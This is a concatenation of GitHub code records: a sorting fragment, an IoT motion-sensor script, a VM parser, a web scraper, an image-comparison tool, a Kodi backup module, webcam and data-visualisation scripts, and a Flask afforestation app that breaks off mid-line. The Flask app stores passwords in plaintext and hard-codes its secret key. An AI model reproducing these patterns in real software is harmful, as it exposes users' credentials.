]\n\t\t\t\tn[ i ] = x\n\t\t\t\tisChanged = True\n\n\n\treturn n\n\n\nif __name__ == '__main__':\n\t\n\tl = [ 10, 0, 5, 3, 20, 1, 54 ] \n\n\tprint( boublesort( l ) )","repo_name":"dragenet/matura-informatyka-python","sub_path":"8_sortowanie_babelkowe/boublesort.py","file_name":"boublesort.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21456283130","text":"#### CREDITS #################################################################\n#\n# This script creates a confidence level of a person being present and reports that\n# into AWS IoT. LED outputs provided for visual feedback of operation (optional).\n#\n# For Python 3\n#\n# This is not production - it is Proof-of-Concept (PoC) only\n#\n####################################################################################\n#\n# Created by Ian Fayers, with extra special thanks to Alex Fayers for his\n# implementation of the confidence algorithm and to Thiha Soe for his easy IoT\n# reporting. Thanks to Richard Westby-Nunn for the inspiration.\n#\n#\n# November 2019 - created as part of the re:Invent Builders Fair\n#\n####################################################################################\n\n# import RPi.GPIO as GPIO\nimport datetime\nimport time\nimport json\nimport requests\nimport sys\nfrom gpiozero import MotionSensor\nfrom gpiozero import LED\n\n#### VARIABLES ###############################################################\n\nloopDelay = 2 # time to wait between movement checks\nminConfidence = 0 # minimum value of confidence that there is a person\nmaxConfidence = 50 # maximum value of confidence that there is a person\n\nstartConfidence = 0 # value of confidence to start the script with\n\nhighThreshold = 30 # value of confidence that will indicate there is a person\nlowThreshold= 10 # value of confidence that will indicate there is no person\n\naddValue = 5 # value to add to confidence upon movement\nsubValue = 3 # value to remove from confidence when there is no movement\n\npersonPresent = 0 # 0 if person not there, 1 if person there\nreminderAnnounce = 270 # number of second to re-announce status (to ensure continuous presence is shown correctly)\n\npath = \"/home/pi/iot/\" # base path for the certificate files\nclient_cert = path + \"6b148d4216-certificate.pem.crt\" # obtained from AWS IoT - note this ID will be different for you\nclient_key = path + \"6b148d4216-private.pem.key\" # obtained from AWS IoT - note this ID will be different for you\nroot_cert = path + \"AmazonRootCA1.pem\" # Amazon root-cert obained from https://www.amazontrust.com/repository/\nurl = \"https://OVERTYPETHIS-ats.iot.us-east-2.amazonaws.com:8443/topics/sensorupdate\" # URL for this Sensor - change OVERTYPETHIS, in fact, change the whole string to the one from your follow-along in the tutorial pack\n\n##### FUNCTIONS ################################################################\n\ndef update_iot(sn, available):\n current_time = datetime.datetime.now()\n timestamp = current_time.isoformat()\n ddb_ttl = int((current_time + datetime.timedelta(minutes=5)).timestamp())\n payload = {\"sn\": sn, \"updated_time\": timestamp, \"ddb_ttl\": ddb_ttl, \"available\": available }\n headers = {'content-type': 'application/json'}\n print(\"Posting: \" + sn + \" - \" + str(timestamp) + \" - \" + str(ddb_ttl) + \" - \" + str(available))\n try:\n r = requests.post(url, data=json.dumps(payload), verify=root_cert, headers=headers, cert=(client_cert, client_key))\n print(r)\n except Exception as e:\n print(e)\n print(\"Post to AWS failed\")\n\n# we'll reverse the serial number to increase the randomness - irrelevent for this small PoC, but useful for scale to mitigate hot-keys\ndef reversestring(s):\n str = \"\"\n for i in s:\n str = i + str\n return str\n\n# get the serial number of each Pi progframmatically; we'll use that as the identifiers for desks/rooms and fix-up on the GUI\ndef getserial():\n # Extract serial from cpuinfo file\n cpuserial = \"0000000000000000\"\n try:\n f = open('/proc/cpuinfo','r')\n for line in f:\n if line[0:6]=='Serial':\n cpuserial = line[10:26]\n cpuserial = 'ID' + reversestring(cpuserial) # flip the serial number to increase the entropy\n f.close()\n except:\n cpuserial = \"ERROR000000000\"\n\n return cpuserial\n\n##### DECISION FUNCTIONS #####################################################\n\ndef active(sn): # what to do when movement is detected past the threshold\n update_iot(sn, 1)\n personPresent = 1\n LEDr.on()\n\ndef notactive(sn): # what to do when no movement has been detected for the set amount\n update_iot(sn, 0)\n personPresent = 0\n LEDr.off()\n\n#### MAIN FUNCTION ############################################################\n\ndef main(debug=1):\n if debug:\n print(\"Debug mode\")\n else:\n print(\"Production mode\")\n confidence = startConfidence\n prevActive = 0\n\n sn = getserial()\n\n if debug: ## DEBUG\n print(\"SERIAL : \" + sn)\n\n reminderTick = 0\n active(sn)\n LEDg.on()\n time.sleep(2)\n\n processing = True # in case we need to exit, can just flip to false\n while processing:\n\n triggertime = datetime.datetime.now().isoformat() + ' : '\n\n # ensure we announce a status regularly, even if no status change (to prevent continuous use of a space showing as unused)\n if reminderTick <= 0:\n print(triggertime + 'Reminder announce = ' + str(personPresent))\n if personPresent:\n active(sn)\n else:\n notactive(sn)\n update_iot(sn, personPresent)\n reminderTick = reminderAnnounce\n reminderTick = reminderTick - loopDelay\n\n currentMovement = PIR.value # update motion sensor value\n\n percentageConfidence = round((confidence/highThreshold)*100)\n if debug: ### DEBUG\n print(triggertime + \"confidence: \"+str(confidence)+\" (\"+str(percentageConfidence)+\"% to active)\")\n\n if currentMovement == 1: # movement but not active yet\n LEDg.on()\n if confidence < (maxConfidence-addValue):\n confidence += addValue # increase confidence if it's not at max already\n\n if debug: ### DEBUG\n print(triggertime + \"movement! (confidence += \"+str(addValue)+\")\")\n\n else: # no movement detected\n LEDg.off()\n if confidence > (minConfidence+subValue):\n confidence -= subValue # decrease confidence if it's not at min already\n\n if debug: ### DEBUG\n print(triggertime +\"(confidence -= \"+str(subValue)+\")\")\n\n if confidence >= highThreshold and prevActive == 0: # person\n active(sn)\n prevActive = 1\n\n if debug: ### DEBUG\n print(triggertime + \" PERSON +++++\")\n\n elif confidence <= lowThreshold and prevActive == 1: # no person\n notactive(sn)\n prevActive = 0\n\n if debug: ### DEBUG\n print(triggertime +\"NO PERSON -----\")\n\n sys.stdout.flush()\n time.sleep(loopDelay) # wait a bit for next check\n\ntry:\n if (sys.version_info < (3, 0)):\n print(\"This script relies upon Python 3, nothing less\\n\")\n exit()\n\n pinLEDred = \"BCM26\" # Red LED shows if sensor detects a perso\n pinLEDgreen = \"BCM14\" # Green LED shows if sensor detects motion\n pinSensor = \"BCM4\" # Sensor LED is input from PIR\n\n PIR = MotionSensor(pinSensor) # init a Motion Sensor object on the GPIO you've connected it to\n LEDr = LED(pinLEDred)\n LEDg = LED(pinLEDgreen)\n main(debug=(len(sys.argv) - 1) > 0) # start monitoring - if any parameters then assume debug mode, otherwise it's prod!\n\nexcept Exception as e:\n print(e)\n print(\"IR control script just failed!\")\n","repo_name":"aws-samples/aws-builders-fair-projects","sub_path":"reinvent-2019/iot-hotdesks/bin/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7450,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"48"} +{"seq_id":"36143502902","text":"#!/usr/bin/env python3.8\n\nimport re\nimport os\n\nfrom enum import Enum, unique, auto\n\nclass Parser:\n def __init__(self, vmFileName, codeRightr):\n self.vmFileName = vmFileName\n self.codeRightr = codeRightr\n \n def argu1(self, comm, cType):\n if cType != commType.cArithmetic:\n return comm.split()[1]\n else:\n return comm.split()[0]\n\n def argu2(self, comm):\n return comm.split()[2]\n\n # Return the command type\n def commandType(self, commLine):\n if commLine:\n\n # Create regular expresions for each command type\n rePush = re.compile('^push')\n rePop = re.compile('^pop')\n reLabel = re.compile('^label')\n reGoto = re.compile('^goto')\n reIf = re.compile('^if')\n reFunction = re.compile('^function')\n reReturn = re.compile('^return')\n reCall = re.compile('^call')\n\n # Use the first word in the command to figure out what type it is\n if rePush.match(commLine):\n return commType.cPush\n elif rePop.match(commLine):\n return commType.cPop\n elif reLabel.match(commLine):\n return commType.cLabel\n elif reGoto.match(commLine):\n return commType.cGoto\n elif reIf.match(commLine):\n return commType.cIf\n elif reFunction.match(commLine):\n return commType.cFunction\n elif reReturn.match(commLine):\n return commType.cReturn\n elif reCall.match(commLine):\n return commType.cCall\n # Else it's arithmetic!:\n else:\n return commType.cArithmetic\n\n def parseFile(self):\n if self.vmFileName:\n self.vmStream = open(self.vmFileName, 'r')\n # Get the name of the file, no path, no extension\n vmShortName = [i for i in os.path.splitext(self.vmFileName)[0].split('/') if i][-1]\n print(f'Working on file: {vmShortName}')\n\n for line in self.vmStream:\n commLine = line.split(\"//\")[0].strip() \n if commLine:\n # Make sure it's lower case so we aren't bamboozeled\n commLine = commLine.lower()\n\n # Determine the command type\n cType = self.commandType(commLine)\n\n # Turn the command into a list to store in appropriate variables\n commList = commLine.split()\n # Pad command list with 'None' in case it's too short\n comLength = 3\n (command, arg1, arg2) = commList[:comLength] + [None]*(comLength-len(commList))\n\n if cType == commType.cArithmetic:\n # Write out arithmetic command\n self.codeRightr.writeArithmetic(command)\n elif cType == commType.cPush or cType == commType.cPop:\n # Write out push or pop command, pass the vm file name to scope the static variables\n self.codeRightr.writePushPop(cType, arg1, arg2, vmShortName)\n elif cType == commType.cLabel:\n # Call write label and pass arg1, the label name\n self.codeRightr.writeLabel(arg1)\n elif cType == commType.cGoto:\n # Call write goto and pass arg1, the label name\n self.codeRightr.writeGoto(arg1)\n elif cType == commType.cIf:\n # Call write if-goto and pass arg1, the label name\n self.codeRightr.writeIf(arg1)\n elif cType == commType.cFunction:\n # Call write function and pass arg1, the function name, and arg2, the num of func args\n self.codeRightr.writeFunction(arg1, arg2)\n elif cType == commType.cReturn:\n # Call write return\n self.codeRightr.writeReturn()\n elif cType == commType.cCall:\n # Call call function, pass arg1, function name, and arg2, num of function arguments\n self.codeRightr.writeCall(arg1, arg2)\n\n self.close()\n\n def close(self):\n self.vmStream.close()\n\n@unique\nclass commType(Enum):\n cArithmetic = auto()\n cPush = auto()\n cPop = auto()\n cLabel = auto()\n cGoto = auto()\n cIf = auto()\n cFunction = auto()\n cReturn = auto()\n cCall = auto()\n","repo_name":"jburnworth/Nand2Tetris","sub_path":"projects/08/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16395102014","text":"import scrapy\nimport asyncio\nasyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n\n\nclass Book(scrapy.Item):\n title = scrapy.Field()\n price = scrapy.Field()\n\nclass BooksSpider(scrapy.Spider):\n \"\"\"Class for scraping books from https://books.toscrape.com/\"\"\"\n\n name = \"books\"\n\n def start_requests(self):\n url = \"https://books.toscrape.com/\"\n yield scrapy.Request(\n url,\n meta=dict(\n playwright=True,\n playwright_include_page=True,\n errback=self.errback,\n ),\n )\n\n async def parse(self, response):\n page = response.meta[\"playwright_page\"]\n await page.close()\n\n for book in response.css(\"article.product_pod\"):\n book = Book(\n title=book.css(\"h3 a::attr(title)\").get(),\n price=book.css(\"p.price_color::text\").get(),\n )\n yield book\n\n async def errback(self, failure):\n page = failure.request.meta[\"playwright_page\"]\n await page.close()\n","repo_name":"AJ07009/Troll_brigde","sub_path":"troll/trollscrape/trollscrape/spiders/bookspider.py","file_name":"bookspider.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22029750715","text":"\"\"\"\n.. module:: payload_recovery_test\n :synopsis: Functionality of payload comparison is defined here\n.. moduleauthor:: Daniel Hislop\n\"\"\"\n\nimport argparse\nimport numpy as np\nfrom PIL import Image\n\ndef get_arguments():\n \"\"\"**Command line argument parsing**\n\n Use of the argparse library to parse user input in the command line application. \n Mode is a positional argument meaning it has to be provided. Others are optional\n so any can be specified. Both mode and algorithm are restricted choice.\n \n Returns:\n Namespace: Parsed user arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Payload Comparison Tool\")\n parser.add_argument(\"-o\", \"--original\", type=str, help=\"Original Payload\")\n parser.add_argument(\"-r\", \"--recovered\", nargs=\"?\", type=str, help=\"Recovered Payload\")\n args = parser.parse_args()\n return args\n\ndef get_file(name):\n \"\"\"**Get File**\n\n Read in image using pillow library and return as numpy array\n\n Args:\n name (String): Name of image file\n Returns:\n ndarray: Numpy array of image file\n \"\"\"\n print(\"Opening %s\" % name)\n temp = Image.open(\"%s\" % name)\n return (np.array(temp))\n\ndef compare(args):\n \"\"\"**Image Comparison**\n\n Compare two images using numpy. Image 1 and 2 are numpy arrays. Use np_array_equal to\n compare. If equal then match, otherwise no match.\n\n Args:\n args (Namespace): Parsed user arguments containing path to original and path to \n recovered payloads.\n \"\"\"\n original = get_file(args.original)\n recovered = get_file(args.recovered)\n if (np.array_equal(original, recovered)):\n print(\"Recovered matches original\")\n else:\n print(\"Recovered does not match original\")\n\ndef main():\n \"\"\"**Driver Code**\n\n Parse user arguments and call comparison function\n \"\"\"\n args = get_arguments()\n compare(args)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"AyCarlito/improved-steganography-project","sub_path":"src/steganography/payload_comparison_tool/payload_recovery_test.py","file_name":"payload_recovery_test.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37650225706","text":"import xbmc\nimport xbmcgui\nimport xbmcvfs\t\nimport xbmcaddon\nimport os\nimport shutil\nimport json\nimport xml.etree.ElementTree as ET \nfrom .addonvar import user_path, data_path, setting, addon_id, packages, addon_name, dialog\n\nuser_path = xbmcvfs.translatePath('special://userdata/')\t\ndata_path = os.path.join(user_path, 'addon_data/')\nskin_path = xbmcvfs.translatePath('special://skin/')\ntext_path = os.path.join(xbmcvfs.translatePath(xbmcaddon.Addon().getAddonInfo('path')), 'resources/', 'texts/')\nskin = ET.parse(os.path.join(skin_path, 'addon.xml'))\nroot = skin.getroot()\nskin_id = root.attrib['id']\ngui_save = os.path.join(user_path, 'gui_settings/')\ngui_file = 'guisettings.xml'\nskinsc = 'script.skinshortcuts'\n\ndef backup(path, file):\n if os.path.exists(os.path.join(path, file)):\n try:\n if os.path.isfile(os.path.join(path, file)):\n xbmcvfs.copy(os.path.join(path, file), os.path.join(packages, file)) #Backup your Kodi specifics (advancedsettings, favs etc...)\n elif os.path.isdir(os.path.join(path, file)):\n shutil.copytree(os.path.join(path, file), os.path.join(packages, file), dirs_exist_ok=True) #Backup your Trakt & Debrid data\n except Exception as e:\n xbmc.log('Failed to backup %s. Reason: %s' % (os.path.join(packages, file), e), xbmc.LOGINFO)\n\ndef backup_gui_skin():\n if not os.path.exists(gui_save):\n os.mkdir(gui_save)\n if os.path.exists(os.path.join(user_path, gui_file)) and os.path.exists(os.path.join(gui_save)):\n try:\n xbmcvfs.copy(os.path.join(user_path, gui_file), os.path.join(gui_save, gui_file)) #Backup gui settings\n except Exception as e:\n xbmc.log('Failed to backup %s. Reason: %s' % (os.path.join(gui_save, gui_file), e), xbmc.LOGINFO) \n if os.path.exists(os.path.join(data_path, skin_id)) and os.path.exists(os.path.join(gui_save)):\n try:\n shutil.copytree(os.path.join(data_path, skin_id), os.path.join(gui_save, skin_id), dirs_exist_ok=True) #Backup skin settings\n except Exception as e:\n xbmc.log('Failed to backup %s. Reason: %s' % (os.path.join(gui_save, skin_id), e), xbmc.LOGINFO)\n if os.path.exists(os.path.join(data_path, skinsc)) and os.path.exists(os.path.join(gui_save)):\n try:\n shutil.copytree(os.path.join(data_path, skinsc), os.path.join(gui_save, skinsc), dirs_exist_ok=True) #Backup skinshortcut settings\n except Exception as e:\n xbmc.log('Failed to backup %s. Reason: %s' % (os.path.join(gui_save, skinsc), e), xbmc.LOGINFO) \n \ndef restore(path, file):\n if os.path.exists(os.path.join(packages, file)):\n try:\n if os.path.isfile(os.path.join(packages, file)):\n if os.path.exists(os.path.join(user_path, file)):\n os.unlink(os.path.join(path, file)) #Remove Kodi specifics (advancedsettings, favs etc...) included with new install\n shutil.move(os.path.join(packages, file), os.path.join(path, file)) #Restore your backed up Kodi specifics (advancedsettings, favs etc...)\n elif os.path.isdir(os.path.join(packages, file)):\n shutil.copytree(os.path.join(packages, file), os.path.join(path, file), dirs_exist_ok=True) #Restore your backed up Trakt & Debrid data\n except Exception as e:\n xbmc.log('Failed to restore %s. Reason: %s' % (os.path.join(path, file), e), xbmc.LOGINFO)\n\ndef restore_gui():\n if os.path.exists(os.path.join(gui_save, gui_file)):\n try:\n xbmcvfs.copy(os.path.join(gui_save, gui_file), os.path.join(user_path, gui_file)) #Restore you backed up gui settings\n except Exception as e:\n xbmc.log('Failed to restore %s. Reason: %s' % (os.path.join(user_path, gui_file), e), xbmc.LOGINFO)\n dialog.ok(addon_name, 'To save changes you now need to force close Kodi, Press OK to force close Kodi')\n os._exit(1)\n \ndef restore_skin():\n if os.path.exists(os.path.join(data_path, skin_id)):\n try:\n shutil.copytree(os.path.join(gui_save, skin_id), os.path.join(data_path, skin_id), dirs_exist_ok=True) #Restore your backed up skin settings\n except Exception as e:\n xbmc.log('Failed to restore %s. Reason: %s' % (os.path.join(data_path, skin_id), e), xbmc.LOGINFO)\n if os.path.exists(os.path.join(data_path, skinsc)) and os.path.exists(os.path.join(gui_save, skinsc)):\n try:\n shutil.copytree(os.path.join(gui_save, skinsc), os.path.join(data_path, skinsc), dirs_exist_ok=True) #Restore your backed up skinshortcuts settings\n except Exception as e:\n xbmc.log('Failed to restore %s. Reason: %s' % (os.path.join(data_path, skinsc), e), xbmc.LOGINFO)\n dialog.ok(addon_name, 'To save changes you now need to force close Kodi, Press OK to force close Kodi')\n os._exit(1)\n\ndef save_backup_restore(_type: str) -> None:\n with open(os.path.join(text_path, 'backup_restore.json'), 'r', encoding='utf-8', errors='ignore') as f:\n item_list = json.loads(f.read())\n for item in item_list.keys():\n setting_id = item_list[item]['setting']\n path = item_list[item]['path']\n data = item + '/settings.xml' #Addon settings\n realizer = item + '/rdauth.json' #Realizer debrid data\n youtube = item + '/api_keys.json' #Youtube API Keys\n if path == 'user_path':\n path = user_path\n elif path == 'data_path':\n path = data_path\n try:\n if setting(setting_id)=='true':\n if _type == 'backup':\n backup(path, data) #Backup all addon data\n backup(user_path, item) #Backup Kodi specifics\n backup(path, realizer) #Backup Realizer data\n backup(path, youtube) #Backup Youtube data\n elif _type == 'restore':\n restore(path, item) #Restore all addon data and Kodi specifics\n except Exception as e:\n xbmc.log(f'Error= {e}', xbmc.LOGINFO)\n continue\n","repo_name":"nebulous42069/diggz","sub_path":"nexus/plugin.program.chef20/resources/lib/modules/save_data.py","file_name":"save_data.py","file_ext":"py","file_size_in_byte":6268,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"44410913872","text":"import cv2\n\ncam = cv2.VideoCapture(0)\n\ncv2.namedWindow(\"test\")\n\nwhile True:\n ret, frame = cam.read()\n cv2.imshow(\"test\", frame)\n if not ret:\n break\n k = cv2.waitKey(1)\n\n if k % 256 == 27:\n # ESC pressed\n print(\"Escape hit, closing...\")\n break\n elif k % 256 == 32:\n # SPACE pressed\n name = input(\"Please enter your name: \")\n cv2.imwrite(name + \".png\", frame)\n print(\"{} written!\".format(name))\n\ncam.release()\n\ncv2.destroyAllWindows()","repo_name":"dacharat/python-deep-learning","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37542730609","text":"import numpy as np\nimport pandas as pd\nimport os,sys\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport plotly as py\nimport plotly.graph_objs as go\nimport plotly.express as px\nfrom plotly.offline import init_notebook_mode, iplot, plot\n\n#数列的路径\n# file_path = os.path.dirname(os.path.abspath(__file__))\nfile_path = 'data'\nfile_path1 = 'pic'\n\n# 读入数据\ndf_2015 = pd.read_csv(f'{file_path}/2015.csv')\ndf_2016 = pd.read_csv(f'{file_path}/2016.csv')\ndf_2017 = pd.read_csv(f'{file_path}/2017.csv')\ndf_2018 = pd.read_csv(f'{file_path}/2018.csv')\ndf_2019 = pd.read_csv(f'{file_path}/2019.csv')\n\n# 新增列-年份\ndf_2015[\"year\"] = str(2015)\ndf_2016[\"year\"] = str(2016)\ndf_2017[\"year\"] = str(2017)\ndf_2018[\"year\"] = str(2018)\ndf_2019[\"year\"] = str(2019)\n\n# 合并数据\ndf_all = df_2015.append([df_2016, df_2017, df_2018, df_2019], sort=False)\ndf_all.drop('Unnamed: 0', axis=1, inplace=True)\ndf_all.head()\ndata = dict(type='choropleth',\n locations=df_2019['region'],\n locationmode='country names',\n colorscale='RdYlGn',\n z=df_2019['happiness'],\n text=df_2019['region'],\n colorbar={'title': '幸福指数'})\n\n# layout = dict(title='2019年世界幸福指数地图',\n# geo=dict(showframe=True, projection={'type': 'azimuthal equal area'}))\n\n# choromap3 = go.Figure(data=[data], layout=layout)\n# plot(choromap3, filename=f'{file_path}/世界幸福地图.html')\n\n# # 合并数据\n# rank_top10 = df_2019.head(10)[['rank', 'region', 'happiness']]\n# last_top10 = df_2019.tail(10)[['rank', 'region', 'happiness']]\n# rank_concat = pd.concat([rank_top10, last_top10])\n\n# # 条形图\n# fig = px.bar(rank_concat,\n# x=\"region\",\n# y=\"happiness\",\n# color=\"region\",\n# title=\"2019年全球最幸福和最不幸福的国家\")\n\n# plot(fig, filename=f'{file_path}/2019世界幸福国家排行Top10和Last10.html')\n\n# 热力图\n# plt.figure(figsize=(25, 20))\n# sns.heatmap(df_all.corr(), cmap='rainbow', linewidths=0.1, annot=True)\n# plt.title('数值变量之间的相关性', fontsize=18)\n# plt.xticks(fontsize=13)\n# plt.yticks(fontsize=13)\n# plt.show()\n\n# # 散点图\n# fig = px.scatter(df_all, x='gdp_per_capita',\n# y='happiness',\n# facet_row='year',\n# color='year',\n# # trendline='ols'\n# )\n# fig.update_layout(height=800, title_text='人均GDP和幸福指数')\n# plot(fig, filename=f'{file_path1}/GDP和幸福得分.html')\n\n# # 散点图\nfig = px.scatter(df_all, x='healthy_life_expectancy',\n y='happiness',\n facet_row='year',\n color='year',\n # trendline='ols'\n )\nfig.update_layout(\n height=800, title_text='健康预期寿命和幸福指数')\nplot(fig, filename=f'{file_path1}/健康预期寿命和幸福得分.html')\n\n# #散点图\n# fig = px.scatter(df_all, x='freedom_to_life_choise',\n# y='happiness',\n# facet_row='year',\n# color='year',\n# trendline='ols'\n# )\n# fig.update_layout(\n# height=800, title_text='自由权和幸福指数')\n# plot(fig, filename=f'{file_path}/自由权和幸福得分.html')\n\n# #散点图\n# fig = px.scatter(df_all, x='corruption_perceptions',\n# y='happiness',\n# facet_row='year',\n# color='year',\n# trendline='ols'\n# )\n# fig.update_layout(\n# height=800, title_text='清廉指数和幸福指数')\n# plot(fig, filename=f'{file_path}/清廉指数和幸福得分.html')\n\n# #散点图\n# fig = px.scatter(df_all, x='generosity',\n# y='happiness',\n# facet_row='year',\n# color='year',\n# trendline='ols'\n# )\n# fig.update_layout(\n# height=800, title_text='慷慨程度和幸福指数')\n# plot(fig, filename=f'{file_path}/慷慨程度和幸福得分.html')\n\n# #散点图\n# fig = px.scatter(df_all, x='social_support',\n# y='happiness',\n# facet_row='year',\n# color='year',\n# trendline='ols'\n# )\n# fig.update_layout(\n# height=800, title_text='社会援助和幸福指数')\n# plot(fig, filename=f'{file_path}/社会援助和幸福得分.html')\n\n#动态图\n# fig = px.scatter(df_all,\n# x='gdp_per_capita',\n# y='happiness',\n# animation_frame='year',\n# animation_group='region',\n# size='rank',\n# color='region',\n# hover_name='region',\n# trendline='ols'\n# )\n# fig.update_layout(title_text='幸福指数vs人均GDP')\n# plot(fig, filename=f'{file_path1}/GDP和幸福水平动态图展示.html')\n#\n# fig = px.scatter(df_all,\n# x='healthy_life_expectancy',\n# y='happiness',\n# animation_frame='year',\n# animation_group='region',\n# size='rank',\n# color='region',\n# hover_name='region',\n# trendline='ols'\n# )\n# fig.update_layout(title_text='幸福排名vs健康预期寿命')\n# plot(fig, filename=f'{file_path1}/健康预期寿命和幸福水平动态图展示.html')\n","repo_name":"cycle13/demo","sub_path":"common_learn/国家幸福指数分析/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8876089184","text":"# import colorama\nimport sqlite3\n\nimport jinja2\nimport plotly.utils\nfrom flask_wtf import FlaskForm\nfrom numpy import unicode\nfrom wtforms import (StringField, SubmitField, DateTimeField, DateField, BooleanField, TextAreaField, SelectField)\nfrom flask import Flask, render_template, url_for, request, session, redirect, flash\nfrom wtforms.validators import DataRequired\nimport folium\nimport pandas as pd\nfrom folium.plugins import MeasureControl, MousePosition\nimport plotly.express as plt\nimport json\nfrom datetime import datetime, date\nimport time\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager, UserMixin, login_required, login_user, logout_user, current_user, login_manager\nfrom plotly import io\nimport os\nimport re\n# import seaborn as sns\n# import dash\n# import matplotlib.pyplot as plt\n# df_suburbs = pd.read_excel(\"C:\\waterwatch_clean2.xlsx\", sheet_name='Sheet1')\n# db_data = pd.read_csv(\"C:\\\\Users\\Public\\data.csv\", delimiter=',')\n# db_data_json = pd.read_json(\"C:\\\\Users\\Public\\csvjson.json\")\ndb_data_parse = json.load(open(\"modifiedjson.json\"))\ndb_data_json_new = pd.read_json(\"modifiedjson.json\")\nmeasure_control = MeasureControl()\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n# print(db_data_json.head().to_json())\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'mysecretkey'\n\n\n# Code Login Form: https://github.com/sathyainfotech/Login-Registration-SQLite.git\ncon = sqlite3.connect(\"mydb.db\")\ncon.execute(\"CREATE TABLE if not exists volunteer(afforestation INTEGER PRIMARY KEY, name TEXT, email TEXT)\")\ncon.execute(\"CREATE TABLE if not exists login(id INTEGER PRIMARY KEY, email TEXT, password TEXT, organisation TEXT)\")\ncon.execute(\"CREATE TABLE if not exists afforestation(id INTEGER PRIMARY KEY, coordinates BLOB, \"\n \"startDate DATE not null, endDate DATE not null, organisation TEXT not null)\")\ncon.close()\n\n\n@app.route('/loginform')\ndef loginform():\n return render_template(\"loginform.html\")\n\n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == 'POST':\n email = request.form['email']\n password = request.form['password']\n con = sqlite3.connect(\"mydb.db\")\n con.row_factory = sqlite3.Row\n cur = con.cursor()\n cur.execute(\"select * from login where email=? and password = ?\", (email, password))\n data = cur.fetchone()\n\n if data:\n session[\"email\"] = data[\"email\"]\n session[\"password\"] = data[\"password\"]\n return redirect(\"user\")\n else:\n flash(\"Email and Password incorrect\", \"danger\")\n return redirect(url_for(\"loginform\"))\n\n\n@app.route('/register', methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == 'POST':\n try:\n organisation = request.form['organisation']\n email = request.form['email']\n password = request.form['password']\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"INSERT INTO login(organisation, email, password) values(?, ?, ?)\", (organisation, email, password))\n con.commit()\n flash(\"Registration completed\", \"success\")\n except:\n flash(\"Registration unsuccessful\", \"danger\")\n finally:\n return redirect(url_for(\"fn\"))\n con.close()\n return render_template(\"register.html\")\n\n\n@app.route('/logout')\ndef logout():\n session.clear()\n filepath = \"specific.json\"\n if os.path.exists(filepath):\n os.remove(filepath)\n else:\n pass\n return redirect(url_for(\"login\"))\n\n\n@app.route('/user', methods=[\"GET\", \"POST\"])\ndef user():\n return render_template(\"user.html\")\n\n\nclass AfforestationForm(FlaskForm):\n # location = json.loads(open(\"bounds.json\"))\n coordinates = StringField()\n startDate = DateField()\n endDate = DateField()\n organisation = StringField()\n submit = SubmitField('Submit')\n\n\nclass JoinForm(FlaskForm):\n afforestation = StringField()\n name = StringField()\n email = StringField()\n submit = SubmitField('Submit')\n\n\n# here was afforestation form\n@app.route('/thankyou')\ndef thankyou():\n return render_template('thankyou.html')\n\n\n@app.route('/home')\ndef fn():\n vis = dataVis()\n treeTypeMap()\n map = treeTypeMap()\n return render_template(\"index.html\", map=map, visualisation=vis)\n\n\n@app.route('/contextinformation')\ndef fn1():\n visHealth = dataVisHealth()\n # mapHealth = treeHealth()\n treeTypeMap()\n map = treeTypeMap()\n return render_template(\"contextInfo.html\", map=map, visualisation=visHealth)\n\n# @app.route('/soiltypeservice')\n# def fn2():\n# visSoil = dataVisSoil()\n# # mapSoil = soilType()\n# map = treeTypeMap()\n# return render_template(\"soilType.html\", map=map, visualisation=visSoil)\n\n\n@app.route('/statusafforestation')\ndef fn3():\n map = treeTypeMap()\n treeTypeMap()\n return render_template(\"statusAfforestation.html\", map=map)\n\n\nglobal poly_ID_selected\nglobal poly_ID_selected_context\n\n\n@app.route('/statusSpecific/')\ndef fn4(poly_id):\n map = treeTypeMap()\n treeTypeMap()\n global poly_ID_selected\n poly_ID_selected = poly_id\n return render_template(\"statusSpecific.html\", map=map, id=poly_id)\n\n\n@app.route('/contextSpecific/')\ndef fn5(poly_id):\n map = treeTypeMap()\n treeTypeMap()\n global poly_ID_selected_context\n poly_ID_selected_context = poly_id\n return render_template(\"contextSpecific.html\", map=map, id=poly_id)\n\n# @app.route('/vegetationSpecific')\n# def specData():\n# specVis = specificDV()\n# map = treeTypeMap()\n# return render_template(\"specificData.html\", map=map, visualisation=specVis)\n#\n# @app.route('/healthSpecific')\n# def specDataHealthTrees():\n# specVis = specificDVhealth()\n# # map = treeHealth()\n# map = treeTypeMap()\n# return render_template(\"specificDatahealth.html\", map=map, visualisation=specVis)\n#\n# @app.route('/soilSpecific')\n# def specDataSoilType():\n# specVis = specificDVsoil()\n# # map = soilType()\n# map = treeTypeMap()\n# return render_template(\"specificDataSoil.html\", map=map, visualisation=specVis)\n\nlorem = \"Pythom\"\nmap_osm = folium.Map(location=[35.000, 33.000], zoom_start=9.5)\n# map_osm = Map(mapobj=folium.Map(location=[35.000, 33.000], zoom_start=8), 